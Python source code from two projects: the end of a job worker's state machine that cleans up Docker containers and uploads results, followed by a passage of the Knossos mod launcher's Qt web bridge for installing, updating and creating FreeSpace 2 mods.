return run_state
def _transition_from_CLEANING_UP(self, run_state):
"""
1- delete the container if still existent
2- clean up the dependencies from bundle directory
3- release the dependencies in dependency manager
4- If bundle has contents to upload (i.e. was RUNNING at some point),
move to UPLOADING_RESULTS state
Otherwise move to FINALIZING state
"""
def remove_path_no_fail(path):
try:
remove_path(path)
except Exception:
logger.error(traceback.format_exc())
if run_state.container_id is not None:
while docker_utils.container_exists(run_state.container):
try:
finished, _, _ = docker_utils.check_finished(run_state.container)
if finished:
run_state.container.remove(force=True)
run_state = run_state._replace(container=None, container_id=None)
break
else:
try:
run_state.container.kill()
except docker.errors.APIError:
logger.error(traceback.format_exc())
time.sleep(1)
except docker.errors.APIError:
logger.error(traceback.format_exc())
time.sleep(1)
for dep in run_state.bundle.dependencies:
if not self.shared_file_system: # No dependencies if shared fs worker
dep_key = DependencyKey(dep.parent_uuid, dep.parent_path)
self.dependency_manager.release(run_state.bundle.uuid, dep_key)
# Clean up dependencies paths
for path in run_state.paths_to_remove or []:
remove_path_no_fail(path)
run_state = run_state._replace(paths_to_remove=[])
if run_state.is_restaged:
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.RESTAGED,
reason=self.RESTAGED_REASON,
)
return run_state._replace(stage=RunStage.RESTAGED)
if not self.shared_file_system and run_state.has_contents:
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.UPLOADING_RESULTS,
)
return run_state._replace(
stage=RunStage.UPLOADING_RESULTS, run_status='Uploading results', container=None
)
else:
# No need to upload results since results are directly written to bundle store
# Delete any files that match the exclude_patterns .
for exclude_pattern in run_state.bundle.metadata["exclude_patterns"]:
full_pattern = os.path.join(run_state.bundle_path, exclude_pattern)
for file_path in glob.glob(full_pattern, recursive=True):
# Only remove files that are subpaths of run_state.bundle_path, in case
# that exclude_pattern is something like "../../../".
if path_is_parent(parent_path=run_state.bundle_path, child_path=file_path):
remove_path(file_path)
return self.finalize_run(run_state)
def _transition_from_UPLOADING_RESULTS(self, run_state):
"""
If bundle not already uploading:
Use the RunManager API to upload contents at bundle_path to the server
Pass the callback to that API such that if the bundle is killed during the upload,
the callback returns false, allowing killable uploads.
If uploading and not finished:
Update run_status with upload progress
If uploading and finished:
Move to FINALIZING state
"""
if run_state.is_restaged:
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.RESTAGED,
reason=self.RESTAGED_REASON,
)
return run_state._replace(stage=RunStage.RESTAGED)
def upload_results():
try:
# Upload results
logger.debug('Uploading results for run with UUID %s', run_state.bundle.uuid)
def progress_callback(bytes_uploaded):
run_status = 'Uploading results: %s done (archived size)' % size_str(
bytes_uploaded
)
self.uploading[run_state.bundle.uuid]['run_status'] = run_status
return True
self.upload_bundle_callback(
run_state.bundle.uuid,
run_state.bundle_path,
run_state.bundle.metadata["exclude_patterns"],
run_state.bundle.metadata["store"],
progress_callback,
)
self.uploading[run_state.bundle.uuid]['success'] = True
except Exception as e:
self.uploading[run_state.bundle.uuid]['run_status'] = (
"Error while uploading: %s" % e
)
logger.error(traceback.format_exc())
self.uploading.add_if_new(
run_state.bundle.uuid, threading.Thread(target=upload_results, args=[])
)
if self.uploading[run_state.bundle.uuid].is_alive():
return run_state._replace(
run_status=self.uploading[run_state.bundle.uuid]['run_status']
)
elif not self.uploading[run_state.bundle.uuid]['success']:
# upload failed
failure_message = run_state.failure_message
if failure_message:
failure_message = (
f'{failure_message}. {self.uploading[run_state.bundle.uuid]["run_status"]}'
)
else:
failure_message = self.uploading[run_state.bundle.uuid]['run_status']
logger.info(
f'Upload failed. uuid: {run_state.bundle.uuid}. failure message: {failure_message}'
)
run_state = run_state._replace(failure_message=failure_message)
self.uploading.remove(run_state.bundle.uuid)
return self.finalize_run(run_state)
def finalize_run(self, run_state):
"""
Prepare the finalize message to be sent with the next checkin
"""
if run_state.is_killed:
# Append kill_message, which contains more useful info on why a run was killed, to the failure message.
failure_message = (
"{}. {}".format(run_state.failure_message, run_state.kill_message)
if run_state.failure_message
else run_state.kill_message
)
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.FINALIZING,
reason=f'Bundle is killed. uuid: {run_state.bundle.uuid}. failure message: {failure_message}',
)
run_state = run_state._replace(failure_message=failure_message)
else:
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.FINALIZING,
)
return run_state._replace(stage=RunStage.FINALIZING, run_status="Finalizing bundle")
def _transition_from_FINALIZING(self, run_state):
"""
        If a full worker cycle has passed since we entered the FINALIZING state, we have already reported to the
        server. If the bundle is going to be sent back to the server, move on to the RESTAGED state. Otherwise,
        move on to the FINISHED state. The bundle_path can also be removed now.
"""
if run_state.is_restaged:
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.RESTAGED,
                reason='the bundle is restaged, as `pass-down-termination` is specified for the worker',
)
return run_state._replace(stage=RunStage.RESTAGED)
elif run_state.finalized:
if not self.shared_file_system:
remove_path(run_state.bundle_path) # don't remove bundle if shared FS
return run_state._replace(stage=RunStage.FINISHED, run_status='Finished')
else:
return run_state
|
web.py
|
## Copyright 2017 Knossos authors, see NOTICE file
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
from __future__ import absolute_import, print_function
import sys
import os.path
import logging
import re
import json
import platform
import stat
import sqlite3
import shutil
import semantic_version
from threading import Thread
from datetime import datetime
from .qt import QtCore, QtGui, QtWidgets, QtWebChannel, read_file, run_in_qt
from . import center, runner, repo, windows, tasks, util, settings, nebula, clibs
if not QtWebChannel:
from .qt import QtWebKit
else:
class WebSocketWrapper(QtWebChannel.QWebChannelAbstractTransport):
_conn = None
_bridge = None
def __init__(self, conn, bridge):
super(WebSocketWrapper, self).__init__()
self._bridge = bridge
self._bridge._conns.append(self)
self._conn = conn
self._conn.textMessageReceived.connect(self.socketMessageReceived)
self._conn.disconnected.connect(self.socketDisconnected)
def sendMessage(self, msg):
for k, v in msg.items():
if isinstance(v, QtCore.QJsonValue):
msg[k] = v.toVariant()
# print('#-> ', json.dumps(msg))
self._conn.sendTextMessage(json.dumps(msg))
def socketMessageReceived(self, msg):
# print('#<- ', json.loads(msg))
self.messageReceived.emit(json.loads(msg), self)
def socketDisconnected(self):
self._bridge._conns.remove(self)
class WebBridge(QtCore.QObject):
_view = None
_last_upload = None
asyncCbFinished = QtCore.Signal(int, str)
showWelcome = QtCore.Signal()
showDetailsPage = QtCore.Signal('QVariant')
showRetailPrompt = QtCore.Signal()
showLaunchPopup = QtCore.Signal(str)
showModDetails = QtCore.Signal(str)
updateModlist = QtCore.Signal(str, str, list)
modProgress = QtCore.Signal(str, float, str)
retailInstalled = QtCore.Signal()
hidePopup = QtCore.Signal()
applyDevDesc = QtCore.Signal(str)
taskStarted = QtCore.Signal(float, str, list)
taskProgress = QtCore.Signal(float, float, str)
taskFinished = QtCore.Signal(float)
taskMessage = QtCore.Signal(str)
fs2Launching = QtCore.Signal()
fs2Launched = QtCore.Signal()
fs2Quit = QtCore.Signal()
def __init__(self, webView=None):
super(WebBridge, self).__init__()
self._view = webView
def load(self):
if QtWebChannel:
self.bridge = self
page = self._view.page()
self._channel = QtWebChannel.QWebChannel(page)
page.setWebChannel(self._channel)
self._channel.registerObject('fs2mod', self)
if center.DEBUG and os.path.isdir('../html'):
from .qt import QtWebSockets, QtNetwork
if QtWebSockets is None:
logging.warn('Remote mode disabled')
link = 'qrc:///html/index.html'
else:
self._conns = []
self._server = QtWebSockets.QWebSocketServer('Knossos interface', QtWebSockets.QWebSocketServer.NonSecureMode)
if not self._server.listen(QtNetwork.QHostAddress.LocalHost, 4007):
logging.warn('Failed to listen on port 4007!')
else:
self._server.newConnection.connect(self._acceptConnection)
with open('../html/qwebchannel.js', 'w') as hdl:
hdl.write(read_file(':/qtwebchannel/qwebchannel.js'))
link = os.path.abspath('../html/index_debug.html')
if sys.platform == 'win32':
link = '/' + link.replace('\\', '/')
link = 'file://' + link
else:
link = 'qrc:///html/index.html'
self._view.load(QtCore.QUrl(link))
def _acceptConnection(self):
conn = self._server.nextPendingConnection()
self._channel.connectTo(WebSocketWrapper(conn, self))
@QtCore.Slot('QVariantList', result=str)
def finishInit(self, tr_keys):
trs = {}
for k in tr_keys:
trs[k] = QtCore.QCoreApplication.translate('modlist_ts', k)
center.main_win.finish_init()
return json.dumps({
't': trs,
'platform': sys.platform,
'welcome': 'KN_WELCOME' in os.environ or center.settings['base_path'] is None,
'explore_mods': center.main_win.get_explore_mod_list_cache_json()
})
@QtCore.Slot(result=str)
def getVersion(self):
return center.VERSION
@QtCore.Slot(result='QVariantList')
def getMods(self):
return list(center.mods.get())
@QtCore.Slot(result='QVariantList')
def getInstalledMods(self):
return list(center.installed.get())
@QtCore.Slot(result='QVariantMap')
def getUpdates(self):
updates = center.installed.get_updates()
result = {}
for mid, items in updates.items():
versions = result[mid] = {}
for ver_a, ver_b in items.items():
versions[str(ver_a)] = str(ver_b)
return result
@QtCore.Slot(str, str, result=bool)
def isInstalled(self, mid, spec=None):
if spec is None:
return mid in center.installed.mods
else:
spec = util.Spec(spec)
mod = center.installed.mods.get(mid, None)
if mod is None:
return False
return spec.match(mod.version)
@QtCore.Slot(str, str, result='QVariantMap')
def query(self, mid, spec=None):
if spec is not None:
if spec == '':
spec = None
else:
if re.search(r'^\d+', spec):
spec = '==' + spec
try:
spec = util.Spec(spec)
except Exception:
logging.exception('Invalid spec "%s" passed to query()!', spec)
return -2
try:
return center.mods.query(mid, spec).get()
except Exception:
return None
@QtCore.Slot()
def fetchModlist(self):
tasks.run_task(tasks.LoadLocalModsTask())
tasks.run_task(tasks.FetchTask())
@QtCore.Slot(bool, result='QVariantList')
def requestModlist(self, async_=False):
if async_:
center.main_win.update_mod_list()
return [None]
else:
return list(center.main_win.search_mods())
@QtCore.Slot(str)
def showTab(self, name):
try:
center.main_win.update_mod_buttons(name)
except Exception:
logging.exception('Failed to switch tabs!')
@QtCore.Slot(str)
def showMod(self, mid):
        # Make sure the mod list is populated.
try:
center.main_win.update_mod_buttons('explore')
self.showModDetails.emit(mid)
except Exception:
logging.exception('Failed to show mod %s!' % mid)
@QtCore.Slot(str)
def triggerSearch(self, term):
center.main_win.perform_search(term)
def _get_mod(self, mid, spec=None, mod_repo=None):
if spec is not None:
if spec == '':
spec = None
else:
if re.search(r'^\d+', spec):
spec = '==' + spec
try:
spec = util.Spec(spec)
except Exception:
logging.exception('Invalid spec "%s" passed to a web API function!', spec)
return -2
if mod_repo is None:
mod_repo = center.installed
try:
return mod_repo.query(mid, spec)
except repo.ModNotFound:
logging.exception('Couldn\'t find mod "%s" (%s)!', mid, spec)
return -1
@QtCore.Slot(str, str, result=int)
def showAvailableDetails(self, mid, spec=None):
mod = self._get_mod(mid, spec, center.mods)
if mod in (-1, -2):
return mod
self.showDetailsPage.emit(mod.get())
return 0
@QtCore.Slot(str, str, result=int)
def showInstalledDetails(self, mid, spec=None):
mod = self._get_mod(mid, spec)
if mod in (-1, -2):
return mod
self.showDetailsPage.emit(mod.get())
return 0
@QtCore.Slot(str, str, 'QStringList', result=int)
def install(self, mid, spec=None, pkgs=None):
mod = self._get_mod(mid, spec, center.mods)
if mod in (-1, -2):
logging.debug('fs2mod.install(%s, %s) = %d', mid, spec, mod)
return mod
if pkgs is None:
pkgs = []
if mod.parent == 'FS2':
retail = self._get_mod('FS2')
if retail == -1:
self.showRetailPrompt.emit()
return 0
windows.ModInstallWindow(mod, pkgs)
return 0
@QtCore.Slot(str, str, 'QStringList', result=int)
def uninstall(self, mid, spec=None, pkgs=None):
mod = self._get_mod(mid, spec)
if mod in (-1, -2):
return mod
if mod.dev_mode:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr("I can't uninstall this mod because it's in dev mode!"))
return 0
if len(pkgs) == 0:
plist = mod.packages
else:
plist = []
pfound = set()
for pkg in mod.packages:
if pkg.name in pkgs:
plist.append(pkg)
pfound.add(pkg.name)
if len(pfound) < len(pkgs):
# Some packages are missing
pmissing = set(pkgs) - pfound
logging.warning('Missing packages %s.', ', '.join(pmissing))
return -2
titles = [pkg.name for pkg in plist if center.installed.is_installed(pkg)]
        # FIXME: Check if any other mod depends on this mod before uninstalling it to avoid broken dependencies.
deps = center.installed.get_dependents(plist)
if deps:
names = sorted([m.title for m in deps])
msg = self.tr('You can\'t uninstall this because %s still depend on it.') % util.human_list(names)
QtWidgets.QMessageBox.critical(None, 'Knossos', msg)
return False
msg = QtWidgets.QMessageBox()
msg.setIcon(QtWidgets.QMessageBox.Question)
msg.setText(self.tr('Do you really want to uninstall %s?') % (mod.title,))
if len(titles) > 0:
msg.setInformativeText(self.tr('%s will be removed.') % (', '.join(titles)))
msg.setStandardButtons(QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)
msg.setDefaultButton(QtWidgets.QMessageBox.No)
if msg.exec_() == QtWidgets.QMessageBox.Yes:
tasks.run_task(tasks.UninstallTask(plist, mods=[mod]))
return True
else:
return False
@QtCore.Slot(str, str, result=int)
def updateMod(self, mid, spec=None):
mod = self._get_mod(mid, spec)
if mod in (-1, -2):
return mod
new_rel = center.mods.query(mod.mid)
try:
old_rel = center.mods.query(mod)
except repo.ModNotFound:
old_rel = mod
try:
latest_ins = center.installed.query(mod.mid).version
except repo.ModNotFound:
latest_ins = None
new_opt_pkgs = set([pkg.name for pkg in new_rel.packages if pkg.status in ('recommended', 'optional')])
old_opt_pkgs = set([pkg.name for pkg in old_rel.packages if pkg.status in ('recommended', 'optional')])
sel_pkgs = []
installed_pkgs = [pkg.name for pkg in mod.packages]
for pkg in new_rel.packages:
if pkg.status == 'required' or pkg.name in installed_pkgs:
sel_pkgs.append(pkg)
if new_opt_pkgs - old_opt_pkgs:
for pkg in new_rel.packages:
if pkg.status == 'recommended' and pkg.name not in sel_pkgs:
sel_pkgs.append(pkg)
all_vers = list(center.installed.query_all(mid))
if len(all_vers) == 1 and not mod.dev_mode:
# Only one version is installed, let's update it.
if new_opt_pkgs - old_opt_pkgs:
# There are new recommended or optional packages, we'll have to ask the user.
windows.ModInstallUpdateWindow(new_rel, mod, [p.name for p in sel_pkgs])
else:
if latest_ins == new_rel.version:
# Only metadata changed
tasks.run_task(tasks.RewriteModMetadata([mod]))
else:
tasks.run_task(tasks.UpdateTask(mod, sel_pkgs))
else:
# Just install the new version
if new_opt_pkgs - old_opt_pkgs:
# There are new recommended or optional packages, we'll have to ask the user.
windows.ModInstallWindow(new_rel, [p.name for p in sel_pkgs])
else:
edit = set()
if mod.dev_mode:
edit.add(mod.mid)
if not mod.dev_mode and latest_ins == new_rel.version:
# Only metadata changed
tasks.run_task(tasks.RewriteModMetadata([mod]))
else:
# NOTE: If a dev mod received a metadata update, we have an edge case in which this function doesn't
# do anything.
# * RewriteModMetadata would remove all local changes which is highly undesirable.
# * InstallTask doesn't update the metadata of installed mods (updates which change the version
# number are technically new mods since they use a different folder)
tasks.run_task(tasks.InstallTask(sel_pkgs, new_rel, editable=edit))
return 0
@QtCore.Slot(float)
def abortTask(self, tid):
if hasattr(center.main_win, 'abort_task'):
center.main_win.abort_task(int(tid))
@QtCore.Slot(str, str, result=int)
def runMod(self, mid, spec=None):
mod = self._get_mod(mid, spec)
if mod in (-1, -2):
return mod
runner.run_mod(mod)
return 0
@QtCore.Slot(str, str, result=list)
def getModTools(self, mid, spec):
mod = self._get_mod(mid, spec)
if mod in (-1, -2):
return [mod]
labels = set()
try:
for exe in mod.get_executables(user=True):
if exe.get('label') is not None:
labels.add(exe['label'])
except repo.NoExecutablesFound:
pass
labels = list(labels)
labels.sort()
return labels
@QtCore.Slot(str, str, str, str, str, result=int)
def runModTool(self, mid, spec, tool, tool_spec, label):
mod = self._get_mod(mid, spec)
if mod in (-1, -2):
return mod
if tool == '':
tool = None
else:
tool = self._get_mod(tool, tool_spec)
if tool in (-1, -2):
return mod
if label == '':
label = None
runner.run_mod(mod, tool, label)
return 0
@QtCore.Slot(str, str, str, bool, list)
def runModAdvanced(self, mid, version, exe, is_tool, mod_flag):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return
runner.run_mod_ex(mod, exe, mod_flag, is_tool)
@QtCore.Slot(str, str, result=int)
def vercmp(self, a, b):
try:
a = semantic_version.Version(a)
b = semantic_version.Version(b)
except Exception:
# logging.exception('Someone passed an invalid version to vercmp()!')
return 0
return a.__cmp__(b)
@QtCore.Slot(str)
def openExternal(self, link):
if ':\\' in link:
link = QtCore.QUrl.fromLocalFile(link)
else:
link = QtCore.QUrl(link)
QtGui.QDesktopServices.openUrl(link)
@QtCore.Slot(str, str, result=str)
def browseFolder(self, title, path):
return QtWidgets.QFileDialog.getExistingDirectory(None, title, path)
@QtCore.Slot(str, str, str, result=list)
def browseFiles(self, title, path, filter_):
res = QtWidgets.QFileDialog.getOpenFileNames(None, title, path, filter_)
if res:
return res[0]
else:
return []
@QtCore.Slot(str, result=str)
def verifyRootVPFolder(self, vp_path):
vp_path_components = os.path.split(vp_path)
if len(vp_path_components) != 2 or vp_path_components[1].lower() != 'root_fs2.vp':
QtWidgets.QMessageBox.critical(
None, 'Knossos', self.tr('The selected path is not to root_fs2.vp!'))
return ''
vp_dir = vp_path_components[0]
if not util.is_fs2_retail_directory(vp_dir):
QtWidgets.QMessageBox.critical(
None, 'Knossos', self.tr('The selected root_fs2.vp\'s folder '
'does not have the FreeSpace 2 files!'))
return ''
return vp_dir
def _filter_out_hidden_files(self, files):
if platform.system() != 'Windows':
return [file for file in files if not file.startswith('.')]
else: # TODO figure out how to identify hidden files on Windows
return files
def _is_program_files_path(self, path):
prog_folders = [os.environ.get('ProgramFiles', 'C:/Program Files'),
os.environ.get('ProgramFiles(x86)', 'C:/Program Files (x86)')]
prog_folders = tuple([f.lower().replace('\\', '/') for f in prog_folders])
return path.lower().replace('\\', '/').startswith(prog_folders)
@QtCore.Slot(str, result=bool)
def setBasePath(self, path):
if os.path.isfile(path):
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('The selected path is not a directory!'))
return False
if platform.system() == 'Windows':
if self._is_program_files_path(path):
result = QtWidgets.QMessageBox.question(None, 'Knossos',
self.tr('Using a folder in "Program Files" for the Knossos '
'library is not recommended, because you will have '
'to always run Knossos as Administrator. Use anyway?'))
if result == QtWidgets.QMessageBox.No:
return False
if os.path.isdir(path):
if os.path.exists(os.path.join(path, center.get_library_json_name())):
logging.info('Knossos library marker file found in selected path')
# TODO log info from JSON file as debug messages?
elif len(self._filter_out_hidden_files(os.listdir(path))) > 0:
result = QtWidgets.QMessageBox.question(None, 'Knossos',
self.tr('Using a non-empty folder for the Knossos library '
'is not recommended, because it can cause problems'
' for Knossos. Use anyway?'))
if result == QtWidgets.QMessageBox.No:
return False
if not os.path.lexists(path):
result = QtWidgets.QMessageBox.question(None, 'Knossos',
self.tr('The selected path does not exist. Should I create the folder?'))
if result == QtWidgets.QMessageBox.Yes:
try:
os.makedirs(path)
except OSError:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr("Failed to create Knossos data folder!"))
return False
else:
return False
else:
vp_path = util.ipath(os.path.join(path, 'root_fs2.vp'))
if os.path.isfile(vp_path):
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr("Please don't use an existing FS2 directory. It won't work! Select an empty directory instead."))
return False
center.settings['base_path'] = os.path.abspath(path)
center.save_settings()
util.ensure_tempdir()
tasks.run_task(tasks.LoadLocalModsTask())
return True
# For when center.installed has not yet been initialized
@QtCore.Slot(result=bool)
def checkIfRetailInstalled(self):
fs2_json_path = os.path.join(center.settings['base_path'], 'FS2', 'mod.json')
return os.path.exists(fs2_json_path)
@QtCore.Slot(int)
def getSettings(self, cb_id):
def cb():
res = settings.get_settings()
self.asyncCbFinished.emit(cb_id, json.dumps(res))
Thread(target=cb).start()
@QtCore.Slot(int)
def getJoysticks(self, cb_id):
def cb():
res = settings.get_joysticks()
self.asyncCbFinished.emit(cb_id, json.dumps(res))
Thread(target=cb).start()
@QtCore.Slot(str, str)
def saveSetting(self, key, value):
try:
value = json.loads(value)
except Exception:
logging.exception('Failed to decode new value for setting "%s"! (%s)' % (key, value))
else:
settings.save_setting(key, value)
@QtCore.Slot(str)
def saveFsoSettings(self, data):
try:
data = json.loads(data)
except Exception:
logging.exception('Failed to decode new FSO settings! (%s)' % data)
else:
center.settings['joystick'] = {
'guid': data.get('joystick_guid', None),
'id': data.get('joystick_id', 99999)
}
center.save_settings()
settings.save_fso_settings(data)
@QtCore.Slot(result=str)
def getDefaultFsoCaps(self):
flags = None
if center.settings['fs2_bin']:
try:
flags = settings.get_fso_flags(center.settings['fs2_bin'])
except Exception:
logging.exception('Failed to fetch FSO flags!')
try:
return json.dumps(flags)
except Exception:
logging.exception('Failed to encode FSO flags!')
@QtCore.Slot(result=str)
def searchRetailData(self):
# Huge thanks go to jr2 for discovering everything implemented here to detect possible FS2 retail installs.
# --ngld
folders = [r'C:\GOG Games\Freespace2', r'C:\Games\Freespace2', r'C:\Games\Freespace 2']
reg = QtCore.QSettings(r'HKEY_CURRENT_USER\Software\Valve\Steam', QtCore.QSettings.NativeFormat)
reg.setFallbacksEnabled(False)
steam_path = reg.value('SteamPath')
if not steam_path:
logging.info('No SteamPath detected!')
else:
steam_config = os.path.join(steam_path, 'config/config.vdf')
if not os.path.isfile(steam_config):
logging.warning('config.vdf is not where I expected it!')
else:
folders.append(os.path.join(steam_path, 'steamapps', 'common', 'Freespace 2'))
with open(steam_config, 'r') as stream:
for m in re.finditer(r'"BaseInstallFolder_[0-9]+"\s+"([^"]+)"', stream.read()):
folders.append(os.path.join(m.group(1), 'Freespace 2'))
for path in (r'HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\GOG.com\GOGFREESPACE2', r'HKEY_LOCAL_MACHINE\SOFTWARE\GOG.com\GOGFREESPACE2'):
reg = QtCore.QSettings(path, QtCore.QSettings.NativeFormat)
reg.setFallbacksEnabled(False)
gog_path = reg.value('PATH')
if gog_path:
folders.append(gog_path)
gog_db = os.path.expandvars(r'%ProgramData%\GOG.com\Galaxy\storage\index.db')
if os.path.isfile(gog_db):
try:
db = sqlite3.connect(gog_db)
c = db.cursor()
c.execute('SELECT localpath FROM Products WHERE productId = 5')
row = c.fetchone()
if row:
folders.append(row[0])
except Exception:
logging.exception('Failed to read GOG index.db!')
gog_db = os.path.expandvars(r'%ProgramData%\GOG.com\Galaxy\storage\galaxy.db')
if os.path.isfile(gog_db):
try:
db = sqlite3.connect(gog_db)
c = db.cursor()
c.execute('SELECT installationPath FROM InstalledBaseProducts WHERE productId = 5')
row = c.fetchone()
if row:
folders.append(row[0])
except Exception:
logging.exception('Failed to read GOG galaxy.db!')
for path in folders:
if util.is_fs2_retail_directory(path):
return path
return ''
@QtCore.Slot(str, result=bool)
def copyRetailData(self, path):
if util.is_fs2_retail_directory(path):
tasks.run_task(tasks.GOGCopyTask(path, os.path.join(center.settings['base_path'], 'FS2')))
return True
elif os.path.isfile(path) and path.endswith('.exe'):
tasks.run_task(tasks.GOGExtractTask(path, os.path.join(center.settings['base_path'], 'FS2')))
return True
elif os.path.isfile(path):
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('The selected path is not a directory and not an installer!'))
return False
else:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('The selected path does not contain the retail files!'))
return False
@QtCore.Slot(result=str)
def getRunningTasks(self):
tasks = center.main_win.get_tasks()
res = {}
for t, task in tasks.items():
res[t] = {
'title': task.title,
'mods': [m.get() for m in task.mods]
}
try:
return json.dumps(res)
except Exception:
logging.exception('Failed to encode running tasks!')
return 'null'
@QtCore.Slot(str, str, str, str, str, str, result=bool)
def createMod(self, ini_path, name, mid, version, mtype, parent):
if mtype in ('mod', 'ext'):
if parent != 'FS2':
parent = self._get_mod(parent)
if parent == -1:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('The selected parent TC is not valid!'))
return False
else:
parent = parent.mid
else:
parent = None
mod = repo.InstalledMod({
'title': name,
'id': mid,
'version': version,
'type': mtype,
'parent': parent,
'dev_mode': True
})
mod.generate_folder()
if os.path.isdir(mod.folder):
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('There already exists a mod with the chosen ID!'))
return False
exists = False
try:
neb = nebula.NebulaClient()
neb.login()
exists = not neb.check_mod_id(mid, name)
except nebula.InvalidLoginException:
QtWidgets.QMessageBox.warning(None, 'Knossos',
self.tr("Knossos couldn't check if your mod ID is unique because it couldn't connect to the Nebula. " +
"Continue at your own risk if you're sure it is unique, otherwise please abort."))
except Exception:
logging.exception('Failed to contact the nebula!')
QtWidgets.QMessageBox.warning(None, 'Knossos',
self.tr("Knossos couldn't check if your mod ID is unique because it couldn't connect to the Nebula. " +
"Continue at your own risk if you're sure it is unique, otherwise please abort."))
if exists:
QtWidgets.QMessageBox.critical(None, 'Knossos',
self.tr('Your chosen mod ID is already being used by someone else. Please choose a different one.'))
return False
upper_folder = os.path.dirname(mod.folder)
if not os.path.isdir(upper_folder):
if mod.mtype in ('tool', 'engine') and upper_folder.endswith('bin'):
try:
os.mkdir(upper_folder)
except Exception:
logging.exception('Failed to create binary folder! (%s)' % upper_folder)
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('I could not create the folder for binaries!'))
return False
elif mod.mtype == 'tc':
try:
os.mkdir(upper_folder)
except Exception:
logging.exception('Failed to create TC folder! (%s)' % upper_folder)
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('I could not create the folder for the TC!'))
return False
else:
logging.error('%s did not exist during mod creation! (parent = %s)' % (mod.folder, mod.parent))
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('The chosen parent does not exist! Something went very wrong here!!'))
return False
os.mkdir(mod.folder)
if ini_path != '':
# We need the ini mod for determining where to pull the VPs from
ini_mod = repo.IniMod()
ini_mod.load(ini_path)
if len(ini_mod.get_primary_list()) > 0:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr(
'Ini mods with a primary list are currently not supported for importing!'))
return False
# This dict will convert a known secondary list entry to a mod.json style dependency
dependency_mapping = {
"mediavps_2014": {
"id": "MVPS",
"version": "3.7.2",
},
"mediavps_3612": {
"id": "MVPS",
"version": "3.6.12",
},
"mediavps": {
"id": "MVPS",
"version": "3.6.10",
},
}
package_dependencies = []
for dependency in ini_mod.get_secondary_list():
dependency = dependency.lower() # The mapping only works for lower case
if dependency not in dependency_mapping:
# An unknown dependency is just skipped
QtWidgets.QMessageBox.warning(None, 'Knossos',
self.tr(
'The mod.ini dependency %s is not known to Knossos and could not be converted to a mod.json dependency.')
% (dependency))
continue
package_dependencies.append(dependency_mapping[dependency])
task = tasks.VpExtractionTask(mod, ini_mod)
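# Once the VPs have been extracted, register each of them as a required package
# on the new mod and save the resulting mod.json.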
def finish_import():
for vp_file in task.get_results():
base_filename = os.path.basename(vp_file).replace(".vp", "")
pkg = repo.InstalledPackage({
'name': base_filename,
'status': 'required',
'folder': base_filename,
'dependencies': package_dependencies,
'is_vp': True
})
mod.add_pkg(pkg)
center.installed.add_mod(mod)
mod.update_mod_flag()
try:
mod.save()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save mod.json!'))
return
center.main_win.update_mod_list()
task.done.connect(finish_import)
tasks.run_task(task)
return True
else:
try:
mod.save()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save mod.json!'))
return False
center.installed.add_mod(mod)
center.main_win.update_mod_list()
return True
@QtCore.Slot(str, str, str, str, result=int)
def addPackage(self, mid, version, pkg_name, pkg_folder):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return mod
if not mod.dev_mode:
QtWidgets.QMessageBox.critical(None, 'Knossos',
self.tr("You can't edit \"%s\" because it isn't in dev mode!") % mod.title)
return -1
pkg = mod.add_pkg(repo.Package({'name': pkg_name}))
pkg.folder = pkg_folder
pkg_path = os.path.join(mod.folder, pkg_folder)
if not os.path.isdir(pkg_path):
os.mkdir(pkg_path)
try:
mod.save()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save mod.json!'))
return -1
center.main_win.update_mod_list()
return len(mod.packages) - 1
@QtCore.Slot(str, str, int, result=bool)
def deletePackage(self, mid, version, idx):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return False
if idx < 0 or idx >= len(mod.packages):
logging.error('Invalid index passed to deletePackage()!')
return False
if not mod.dev_mode:
QtWidgets.QMessageBox.critical(None, 'Knossos',
self.tr("You can't edit \"%s\" because it isn't in dev mode!") % mod.title)
return False
# TODO: Delete the package folder?
del mod.packages[idx]
try:
mod.save()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save mod.json!'))
return False
center.main_win.update_mod_list()
return True
@QtCore.Slot(str, result=str)
def selectImage(self, old_path):
if old_path == '':
old_dir = None
else:
old_dir = os.path.dirname(old_path)
new_path, used_filter = QtWidgets.QFileDialog.getOpenFileName(None, self.tr('Please select an image'), old_dir,
self.tr('Image (*.png *.jpg *.jpeg *.gif *.bmp)'))
if new_path:
return new_path
elif os.path.isfile(old_path):
return old_path
else:
return ''
@QtCore.Slot(str, result=list)
def addPkgExe(self, folder):
if sys.platform == 'win32':
